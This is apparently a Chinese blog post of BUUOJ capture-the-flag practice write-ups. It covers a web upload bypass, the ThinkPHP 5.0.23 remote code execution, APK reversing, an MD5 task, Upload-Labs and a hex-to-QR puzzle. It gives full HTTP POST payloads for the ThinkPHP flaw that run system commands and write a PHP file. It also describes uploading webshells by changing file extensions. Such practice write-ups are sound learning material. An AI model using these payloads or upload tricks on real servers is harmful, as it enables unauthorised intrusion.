BUU刷题 WEEK2

WEB:[ACTF2020 新生赛]Upload

在这里插入图片描述
上传文件
只能上传图像
传一个test.jpg,里面的内容:
在这里插入图片描述

在这里插入图片描述
后缀改成phtml
在这里插入图片描述
菜刀连接
在这里插入图片描述
在这里插入图片描述
flag
在这里插入图片描述

REAL:[ThinkPHP]5.0.23-Rce

原POC

POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
POST /index.php?s=captcha HTTP/1.1
Host: node3.buuoj.cn:26646
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 107

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "<?php phpinfo(); ?>" > test.php

然后访问test.php, 拿到flag

RE:helloword

学习使用APKIDE和JEB
打开文件,搜索
在这里插入图片描述
JEB用这个打开
在这里插入图片描述
搜索ctrl+f
找到flag
在这里插入图片描述

Crypto: 丢失的MD5

修改成py3的格式,记得encode,然后运行,拿到flag
在这里插入图片描述

Basic:Upload-Labs-Linux

有点多,我单独开一篇吧,
这里就写一下第一个:
直接上传一个webshell,后缀改成.jpg,然后在burp suite里拦截,再把后缀改成.php,然后冰蝎连接就行

http://fb7539de-cfed-4648-9deb-4639fb7ba56b.node3.buuoj.cn/upload/shell.php

Misc:梅花香之苦寒来

挺麻烦,打死出题人
010打开,看到有很多数据
在这里插入图片描述
复制之后16进制转成ascii,
16进制转换:

https://www.sojson.com/hexadecimal.html

然后把替换一下( , ) ,
变成这样:
在这里插入图片描述
然后用gnuplot画出二维码
在这里插入图片描述
扫了之后得到flag
在这里插入图片描述
PWN:
继续魔芋

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值